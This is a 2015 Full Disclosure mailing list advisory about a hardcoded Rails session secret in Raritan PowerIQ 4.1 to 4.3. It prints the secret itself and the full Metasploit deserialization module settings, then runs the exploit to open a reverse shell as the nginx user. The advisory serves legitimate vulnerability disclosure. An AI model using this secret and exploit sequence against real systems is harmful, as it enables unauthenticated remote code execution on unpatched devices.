Full Disclosure mailing list archives

By Date By Thread Raritan PowerIQ known session secret From: Brandon Perry <bperry.volatile () gmail com>

Date: Wed, 11 Mar 2015 19:57:17 -0500

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems. msf exploit(rails_secret_deserialization) > show options Module options (exploit/multi/http/rails_secret_deserialization): Name Current Setting Required Description ---- --------------- -------- ----------- COOKIE_NAME no The name of the session cookie DIGEST_NAME SHA1 yes The digest type used to HMAC the session cookie HTTP_METHOD GET yes The HTTP request method (GET, POST, PUT typically work) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RAILSVERSION 3 yes The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4) RHOST 192.168.0.20 yes The target address RPORT 443 yes The target port SALTENC BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw== yes The encrypted cookie salt SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8 yes The signed encrypted cookie salt SECRET 8e238c9702412d475a4c44b7726a0537 yes The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie) TARGETURI /login/login yes The path to a vulnerable Ruby on Rails application VALIDATE_COOKIE true no Only send the payload if the session cookie is validated VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(rails_secret_deserialization) > exploit [*] Started reverse handler on 192.168.0.19:4444 [*] Checking for cookie [*] Adjusting cookie name to _session_id [+] SECRET matches! Sending exploit payload [*] Sending cookie _session_id [*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500 id uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users) -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Raritan PowerIQ known session secret Brandon Perry (Mar 11)